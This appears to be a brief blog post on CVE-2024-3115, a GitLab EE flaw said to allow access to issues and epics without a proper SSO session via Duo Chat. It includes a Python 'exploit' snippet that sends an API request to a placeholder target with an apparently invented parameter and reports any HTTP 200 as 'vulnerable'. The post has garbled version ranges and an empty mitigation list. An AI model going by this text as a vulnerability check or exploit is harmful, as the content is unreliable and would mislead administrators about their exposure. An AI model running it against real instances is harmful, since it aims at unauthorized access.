A critical vulnerability (CVE-2024-3115) has been discovered recently in GitLab EE that could allow attackers to bypass security measures in the system and gain unauthorized access to issues and epics without a proper Single Sign-On (SSO) session created with Duo Chat. This issue affects all versions of GitLab EE from 16. to 16.11.5, from 17. to 17..3, and from 17.1 to 17.1.1. In this post, we will discuss the technical details of this vulnerability, its potential impacts, and how you can mitigate the issue in your GitLab installation.

Exploit Details

The vulnerability exists due to an improper access control mechanism implemented in GitLab EE for handling issues and epics. This allows an attacker to exploit the Duo Chat functionality in the application and potentially access confidential information, manipulate data, or perform unauthorized actions on behalf of a legitimate user.

The following code snippet demonstrates the exploitation of this vulnerability

import requests

target_url = "https://target.example.com/gitlab";
access_token = "your_access_token_here"

headers = {
    "Content-Type": "application/json",
    "Private-Token": access_token,
}

response = requests.get(f"{target_url}/api/v4/issues?search_using_duo_chat=true", headers=headers)

if response.status_code == 200:
    print("Vulnerable to CVE-2024-3115")
else:
    print("Not vulnerable to CVE-2024-3115")

Replace target.example.com and your_access_token_here with the appropriate values for your GitLab instance. Running this script will reveal whether your GitLab installation is vulnerable to the CVE-2024-3115 exploit.

Original References

1. GitLab: GitLab Security Advisory
2. NVD: National Vulnerability Database - CVE-2024-3115
3. MITRE: CVE-2024-3115

Mitigation

To mitigate this vulnerability, it is highly recommended to update your GitLab EE installation to the latest patched version available. Depending on the affected version, the following steps can be taken:

Conclusion

CVE-2024-3115 is a critical vulnerability found in GitLab EE that allows attackers unauthorized access to issues and epics in the system without a proper SSO session created via Duo Chat. Affected GitLab administrators should update their installations immediately to ensure their issue and epic data remains secure from potential attackers. By applying the proper patches and following GitLab's security recommendations, you can protect your users and data from this serious security flaw.

Timeline

Published on: 06/27/2024 00:15:11 UTC
Last modified on: 06/28/2024 13:22:33 UTC